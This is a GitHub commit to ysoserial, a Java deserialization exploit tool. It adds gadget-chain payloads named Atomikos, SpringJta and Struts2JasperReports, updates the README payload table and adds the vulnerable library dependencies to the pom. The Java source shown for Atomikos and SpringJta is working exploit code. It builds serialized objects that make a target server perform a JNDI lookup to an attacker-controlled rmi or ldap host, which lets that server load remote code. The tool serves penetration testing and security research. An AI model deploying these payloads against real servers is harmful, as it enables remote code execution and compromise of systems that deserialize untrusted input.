Skip to content

Commit 02e2500

Browse files
scicconesciccone
authored
New gadgets (Struts2JasperReports - Atomikos - SpringJta) (#123)
* added Atomikos gadget payload * added Atomikos gadget payload * naming * added spring-jta gadget * added strutsJasperReports gadget + tests * updated deps list on springJta * fixed authors * renaming
1 parent 9c448b5 commit 02e2500

File tree

8 files changed

+384
-41
lines changed

8 files changed

+384
-41
lines changed

README.md

Lines changed: 39 additions & 37 deletions
Original file line numberDiff line numberDiff line change
@@ -43,44 +43,46 @@ are not responsible or liable for misuse of the software. Use responsibly.
4343
```shell
4444
$ java -jar ysoserial.jar
4545
Y SO SERIAL?
46-
Usage: java -jar ysoserial.jar [payload] '[command]'
46+
Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'
4747
Available payload types:
48-
Payload Authors Dependencies
49-
------- ------- ------------
50-
AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
51-
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
52-
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
53-
Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
54-
Clojure @JackOfMostTrades clojure:1.8.0
55-
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
56-
CommonsCollections1 @frohoff commons-collections:3.1
57-
CommonsCollections2 @frohoff commons-collections4:4.0
58-
CommonsCollections3 @frohoff commons-collections:3.1
59-
CommonsCollections4 @frohoff commons-collections4:4.0
60-
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
61-
CommonsCollections6 @matthias_kaiser commons-collections:3.1
62-
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
63-
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
64-
Groovy1 @frohoff groovy:2.3.9
65-
Hibernate1 @mbechler
66-
Hibernate2 @mbechler
67-
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
68-
JRMPClient @mbechler
69-
JRMPListener @mbechler
70-
JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
71-
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
72-
Jdk7u21 @frohoff
73-
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
74-
MozillaRhino1 @matthias_kaiser js:1.7R2
75-
MozillaRhino2 @_tint0 js:1.7R2
76-
Myfaces1 @mbechler
77-
Myfaces2 @mbechler
78-
ROME @mbechler rome:1.0
79-
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
80-
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
81-
URLDNS @gebl
82-
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
83-
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
48+
Payload Authors Dependencies
49+
------- ------- ------------
50+
Atomikos @pwntester, @sciccone transactions-osgi:4.0.6, jta:1.1
51+
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
52+
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
53+
Clojure @JackOfMostTrades clojure:1.8.0
54+
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
55+
CommonsCollections1 @frohoff commons-collections:3.1
56+
CommonsCollections2 @frohoff commons-collections4:4.0
57+
CommonsCollections3 @frohoff commons-collections:3.1
58+
CommonsCollections4 @frohoff commons-collections4:4.0
59+
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
60+
CommonsCollections6 @matthias_kaiser commons-collections:3.1
61+
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
62+
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
63+
Groovy1 @frohoff groovy:2.3.9
64+
Hibernate1 @mbechler
65+
Hibernate2 @mbechler
66+
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
67+
JRMPClient @mbechler
68+
JRMPListener @mbechler
69+
JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
70+
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
71+
Jdk7u21 @frohoff
72+
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
73+
MozillaRhino1 @matthias_kaiser js:1.7R2
74+
MozillaRhino2 @_tint0 js:1.7R2
75+
Myfaces1 @mbechler
76+
Myfaces2 @mbechler
77+
ROME @mbechler rome:1.0
78+
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
79+
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
80+
SpringJta @zerothoughts, @sciccone spring-tx:5.1.7.RELEASE, spring-context:5.1.7.RELEASE, jta:1.1
81+
Struts2JasperReports @sciccone struts2-core:2.5.20, struts2-jasperreports-plugin:2.5.20
82+
URLDNS @gebl
83+
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
84+
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
85+
8486
```
8587

8688
## Examples

pom.xml

Lines changed: 29 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -277,9 +277,9 @@
277277
<version>1.7R2</version>
278278
</dependency>
279279
<dependency>
280-
<groupId>javassist</groupId>
281-
<artifactId>javassist</artifactId>
282-
<version>3.12.0.GA</version>
280+
<groupId>javassist</groupId>
281+
<artifactId>javassist</artifactId>
282+
<version>3.12.0.GA</version>
283283
</dependency>
284284
<dependency>
285285
<groupId>org.jboss.weld</groupId>
@@ -326,6 +326,32 @@
326326
<artifactId>vaadin-server</artifactId>
327327
<version>7.7.14</version>
328328
</dependency>
329+
<dependency>
330+
<groupId>com.atomikos</groupId>
331+
<artifactId>transactions-osgi</artifactId>
332+
<version>4.0.6</version>
333+
</dependency>
334+
<dependency>
335+
<groupId>org.springframework</groupId>
336+
<artifactId>spring-tx</artifactId>
337+
<version>5.1.7.RELEASE</version>
338+
</dependency>
339+
<dependency>
340+
<groupId>org.springframework</groupId>
341+
<artifactId>spring-context</artifactId>
342+
<version>5.1.7.RELEASE</version>
343+
</dependency>
344+
<dependency>
345+
<groupId>org.apache.struts</groupId>
346+
<artifactId>struts2-core</artifactId>
347+
<version>2.5.20</version>
348+
</dependency>
349+
<dependency>
350+
<groupId>org.apache.struts</groupId>
351+
<artifactId>struts2-jasperreports-plugin</artifactId>
352+
<version>2.5.20</version>
353+
</dependency>
354+
329355
<dependency>
330356
<groupId>org.aspectj</groupId>
331357
<artifactId>aspectjweaver</artifactId>

src/main/java/ysoserial/payloads/Atomikos.java

Lines changed: 77 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,77 @@
1+
package ysoserial.payloads;
2+
3+
import javax.management.BadAttributeValueExpException;
4+
5+
import com.atomikos.icatch.jta.RemoteClientUserTransaction;
6+
7+
import ysoserial.payloads.annotation.Authors;
8+
import ysoserial.payloads.annotation.Dependencies;
9+
import ysoserial.payloads.annotation.PayloadTest;
10+
import ysoserial.payloads.util.PayloadRunner;
11+
import ysoserial.payloads.util.Reflections;
12+
13+
/**
14+
*
15+
* Gadget chain:
16+
*
17+
* javax/management/BadAttributeValueExpException.readObject()
18+
* com/atomikos/icatch/jta/RemoteClientUserTransaction.toString()
19+
* com/atomikos/icatch/jta/RemoteClientUserTransaction.checkSetup()
20+
* javax/naming/InitialContext.lookup()
21+
*
22+
*
23+
* Arguments:
24+
* - (rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname>
25+
*
26+
*
27+
* @author pwntester
28+
* payload added by sciccone
29+
*
30+
* This gadget chain was also discovered by pwntester:
31+
* https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
32+
*
33+
*/
34+
@PayloadTest(harness="ysoserial.test.payloads.JRMPReverseConnectTest")
35+
@Dependencies( { "com.atomikos:transactions-osgi:4.0.6", "javax.transaction:jta:1.1" } )
36+
@Authors({ Authors.PWNTESTER, Authors.SCICCONE })
37+
public class Atomikos implements ObjectPayload<Object> {
38+
39+
@Override
40+
public Object getObject(String command) throws Exception {
41+
42+
// validate command
43+
int sep = command.lastIndexOf('/');
44+
if ( sep < 0 || (!command.startsWith("ldap") && !command.startsWith("rmi")))
45+
throw new IllegalArgumentException("Command format is: " + command
46+
+ "(rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname>");
47+
48+
String url = command.substring(0, sep);
49+
String className = command.substring(sep + 1);
50+
51+
// create factory based on url
52+
String initialContextFactory;
53+
if (url.startsWith("ldap"))
54+
initialContextFactory = "com.sun.jndi.ldap.LdapCtxFactory";
55+
else
56+
initialContextFactory = "com.sun.jndi.rmi.registry.RegistryContextFactory";
57+
58+
// create object
59+
RemoteClientUserTransaction rcut = new RemoteClientUserTransaction();
60+
61+
// set values using reflection
62+
Reflections.setFieldValue(rcut, "initialContextFactory", initialContextFactory);
63+
Reflections.setFieldValue(rcut, "providerUrl", url);
64+
Reflections.setFieldValue(rcut, "userTransactionServerLookupName", className);
65+
66+
// create exception
67+
BadAttributeValueExpException exception = new BadAttributeValueExpException(null);
68+
Reflections.setFieldValue(exception, "val", rcut);
69+
70+
return exception;
71+
}
72+
73+
74+
public static void main ( final String[] args ) throws Exception {
75+
PayloadRunner.run(Atomikos.class, args);
76+
}
77+
}

src/main/java/ysoserial/payloads/SpringJta.java

Lines changed: 74 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,74 @@
1+
package ysoserial.payloads;
2+
3+
import org.springframework.transaction.jta.JtaTransactionManager;
4+
5+
import ysoserial.payloads.annotation.Authors;
6+
import ysoserial.payloads.annotation.Dependencies;
7+
import ysoserial.payloads.annotation.PayloadTest;
8+
import ysoserial.payloads.util.PayloadRunner;
9+
10+
/**
11+
*
12+
* Gadget chain:
13+
*
14+
* org.springframework.transaction.jta.JtaTransactionManager.readObject()
15+
* org.springframework.transaction.jta.JtaTransactionManager.initUserTransactionAndTransactionManager()
16+
* org.springframework.transaction.jta.JtaTransactionManager.lookupUserTransaction()
17+
* org.springframework.jndi.JndiTemplate.lookup()
18+
* javax.naming.InitialContext.lookup()
19+
*
20+
*
21+
* Arguments:
22+
* - (rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname>
23+
*
24+
*
25+
* @author zerothoughts
26+
* payload added by sciccone
27+
*
28+
* This gadget was discovered by zerothoughts:
29+
* https://github.com/zerothoughts/spring-jndi
30+
*
31+
*/
32+
@PayloadTest(harness="ysoserial.test.payloads.JRMPReverseConnectTest")
33+
@Dependencies( {
34+
"org.springframework:spring-tx:5.1.7.RELEASE",
35+
"org.springframework:spring-context:5.1.7.RELEASE",
36+
"javax.transaction:jta:1.1"
37+
} )
38+
@Authors({ Authors.ZEROTHOUGHTS, Authors.SCICCONE })
39+
public class SpringJta implements ObjectPayload<Object>, DynamicDependencies {
40+
41+
@Override
42+
public Object getObject(String command) throws Exception {
43+
44+
// validate command
45+
if ( !(command.startsWith("ldap://") || command.startsWith("rmi://")) )
46+
throw new IllegalArgumentException("Command format is: "
47+
+ "(rmi,ldap)://<attacker_server>[:<attacker_port>]/<classname>");
48+
49+
// create object
50+
JtaTransactionManager jta = new JtaTransactionManager();
51+
jta.setUserTransactionName(command);
52+
53+
return jta;
54+
}
55+
56+
57+
public static void main ( final String[] args ) throws Exception {
58+
PayloadRunner.run(SpringJta.class, args);
59+
}
60+
61+
62+
// add dependencies for testing
63+
public static String[] getDependencies () {
64+
return new String[] {
65+
"org.springframework:spring-tx:5.1.7.RELEASE",
66+
"org.springframework:spring-context:5.1.7.RELEASE",
67+
"org.springframework:spring-beans:5.1.7.RELEASE",
68+
"org.springframework:spring-core:5.1.7.RELEASE",
69+
"commons-logging:commons-logging:1.2",
70+
"javax.transaction:jta:1.1"
71+
};
72+
73+
}
74+
}

0 commit comments

Comments
 (0)